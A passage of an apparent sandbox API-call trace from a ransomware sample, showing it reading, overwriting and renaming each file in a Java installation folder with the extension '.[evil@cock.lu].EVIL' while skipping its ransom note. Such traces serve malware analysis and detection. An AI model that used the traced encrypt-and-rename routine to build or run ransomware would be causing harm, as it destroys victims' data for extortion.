lpDistanceToMoveHigh=0x0) returned 0x0 [0092.058] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0092.080] CloseHandle (hObject=0x1a4) returned 1 [0092.093] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxwebkit.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.093] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.093] __uncaught_exception () returned 0x84b1160800 [0092.093] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.095] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jfxwebkit.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxwebkit.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jfxwebkit.dll.[evil@cock.lu].evil")) returned 1 [0092.095] ??_V@YAXPEAX@Z () returned 0x1 [0092.098] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxwebkit.dll", dwFileAttributes=0x0) returned 0 [0092.098] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.098] wcsstr (_Str="jjs.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.098] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jjs.exe") returned 47 [0092.098] wcscmp (_String1="jjs.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.098] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jjs.exe") returned 0x0 [0092.098] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jjs.exe") returned 0x2f [0092.098] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jjs.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.100] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x3e40, lpOverlapped=0x0) returned 1 [0092.183] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.183] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.183] _errno () returned 0x84b1160840 [0092.184] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x3e60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x3e60, lpOverlapped=0x0) returned 1 [0092.184] CloseHandle (hObject=0x1a4) returned 1 [0092.184] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jjs.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.185] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.185] __uncaught_exception () returned 0x84b1160800 [0092.185] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.185] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jjs.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jjs.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jjs.exe.[evil@cock.lu].evil")) returned 1 [0092.186] ??_V@YAXPEAX@Z () returned 0x1 [0092.189] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jjs.exe", dwFileAttributes=0x0) returned 0 [0092.189] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.189] wcsstr (_Str="jli.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.189] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jli.dll") returned 47 [0092.189] wcscmp (_String1="jli.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.189] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jli.dll") returned 0x0 [0092.189] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jli.dll") returned 0x2f [0092.189] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jli.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.191] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x2aa40, lpOverlapped=0x0) returned 1 [0092.285] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.285] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.285] _errno () returned 0x84b1160840 [0092.285] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.285] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x2aa60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x2aa60, lpOverlapped=0x0) returned 1 [0092.285] CloseHandle (hObject=0x1a4) returned 1 [0092.286] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jli.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.286] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.286] __uncaught_exception () returned 0x84b1160800 [0092.286] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.286] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jli.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jli.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jli.dll.[evil@cock.lu].evil")) returned 1 [0092.287] ??_V@YAXPEAX@Z () returned 0x1 [0092.290] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jli.dll", dwFileAttributes=0x0) returned 0 [0092.290] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.290] wcsstr (_Str="jp2iexp.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.290] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2iexp.dll") returned 51 [0092.290] wcscmp (_String1="jp2iexp.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.290] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jp2iexp.dll") returned 0x0 [0092.290] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2iexp.dll") returned 0x33 [0092.290] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2iexp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.433] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x48040, lpOverlapped=0x0) returned 1 [0092.446] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.446] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.446] _errno () returned 0x84b1160840 [0092.446] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.446] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x48060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x48060, lpOverlapped=0x0) returned 1 [0092.447] CloseHandle (hObject=0x1a4) returned 1 [0092.447] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2iexp.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.447] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.447] __uncaught_exception () returned 0x84b1160800 [0092.447] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.448] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2iexp.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2iexp.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2iexp.dll.[evil@cock.lu].evil")) returned 1 [0092.448] ??_V@YAXPEAX@Z () returned 0x1 [0092.451] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2iexp.dll", dwFileAttributes=0x0) returned 0 [0092.451] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.451] wcsstr (_Str="jp2launcher.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.451] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2launcher.exe") returned 55 [0092.451] wcscmp (_String1="jp2launcher.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.451] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jp2launcher.exe") returned 0x0 [0092.451] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2launcher.exe") returned 0x37 [0092.451] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2launcher.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.453] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x1b440, lpOverlapped=0x0) returned 1 [0092.456] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.456] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.456] _errno () returned 0x84b1160840 [0092.456] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.456] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1b460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x1b460, lpOverlapped=0x0) returned 1 [0092.456] CloseHandle (hObject=0x1a4) returned 1 [0092.457] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2launcher.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.457] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.459] __uncaught_exception () returned 0x84b1160800 [0092.459] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.459] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2launcher.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2launcher.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2launcher.exe.[evil@cock.lu].evil")) returned 1 [0092.460] ??_V@YAXPEAX@Z () returned 0x1 [0092.467] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2launcher.exe", dwFileAttributes=0x0) returned 0 [0092.467] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.467] wcsstr (_Str="jp2native.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.467] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2native.dll") returned 53 [0092.467] wcscmp (_String1="jp2native.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.467] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jp2native.dll") returned 0x0 [0092.467] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2native.dll") returned 0x35 [0092.467] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2native.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.469] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4e40, lpOverlapped=0x0) returned 1 [0092.472] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.472] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.472] _errno () returned 0x84b1160840 [0092.472] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.472] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x4e60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4e60, lpOverlapped=0x0) returned 1 [0092.472] CloseHandle (hObject=0x1a4) returned 1 [0092.472] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2native.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.472] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.472] __uncaught_exception () returned 0x84b1160800 [0092.473] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.473] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2native.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2native.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2native.dll.[evil@cock.lu].evil")) returned 1 [0092.473] ??_V@YAXPEAX@Z () returned 0x1 [0092.476] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2native.dll", dwFileAttributes=0x0) returned 0 [0092.476] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.476] wcsstr (_Str="jp2ssv.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.476] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2ssv.dll") returned 50 [0092.476] wcscmp (_String1="jp2ssv.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.476] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jp2ssv.dll") returned 0x0 [0092.476] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2ssv.dll") returned 0x32 [0092.477] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2ssv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.478] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x39440, lpOverlapped=0x0) returned 1 [0092.481] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.481] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.481] _errno () returned 0x84b1160840 [0092.481] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.481] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x39460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x39460, lpOverlapped=0x0) returned 1 [0092.482] CloseHandle (hObject=0x1a4) returned 1 [0092.482] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2ssv.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.482] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.482] __uncaught_exception () returned 0x84b1160800 [0092.482] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.482] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2ssv.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2ssv.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jp2ssv.dll.[evil@cock.lu].evil")) returned 1 [0092.483] ??_V@YAXPEAX@Z () returned 0x1 [0092.486] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2ssv.dll", dwFileAttributes=0x0) returned 0 [0092.486] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.486] wcsstr (_Str="jpeg.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.486] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jpeg.dll") returned 48 [0092.486] wcscmp (_String1="jpeg.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.486] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jpeg.dll") returned 0x0 [0092.486] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jpeg.dll") returned 0x30 [0092.486] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jpeg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.489] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x2d440, lpOverlapped=0x0) returned 1 [0092.491] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.491] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.491] _errno () returned 0x84b1160840 [0092.491] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.491] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2d460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x2d460, lpOverlapped=0x0) returned 1 [0092.492] CloseHandle (hObject=0x1a4) returned 1 [0092.492] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jpeg.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.492] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.493] __uncaught_exception () returned 0x84b1160800 [0092.493] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.493] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jpeg.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jpeg.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jpeg.dll.[evil@cock.lu].evil")) returned 1 [0092.493] ??_V@YAXPEAX@Z () returned 0x1 [0092.496] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jpeg.dll", dwFileAttributes=0x0) returned 0 [0092.496] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.496] wcsstr (_Str="jsdt.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.496] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsdt.dll") returned 48 [0092.496] wcscmp (_String1="jsdt.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.496] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jsdt.dll") returned 0x0 [0092.496] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsdt.dll") returned 0x30 [0092.496] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jsdt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.498] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4840, lpOverlapped=0x0) returned 1 [0092.500] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.500] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.500] _errno () returned 0x84b1160840 [0092.500] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.500] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x4860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4860, lpOverlapped=0x0) returned 1 [0092.501] CloseHandle (hObject=0x1a4) returned 1 [0092.501] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsdt.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.501] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.501] __uncaught_exception () returned 0x84b1160800 [0092.501] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.501] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jsdt.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsdt.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jsdt.dll.[evil@cock.lu].evil")) returned 1 [0092.502] ??_V@YAXPEAX@Z () returned 0x1 [0092.505] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsdt.dll", dwFileAttributes=0x0) returned 0 [0092.505] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.505] wcsstr (_Str="jsound.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.505] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program 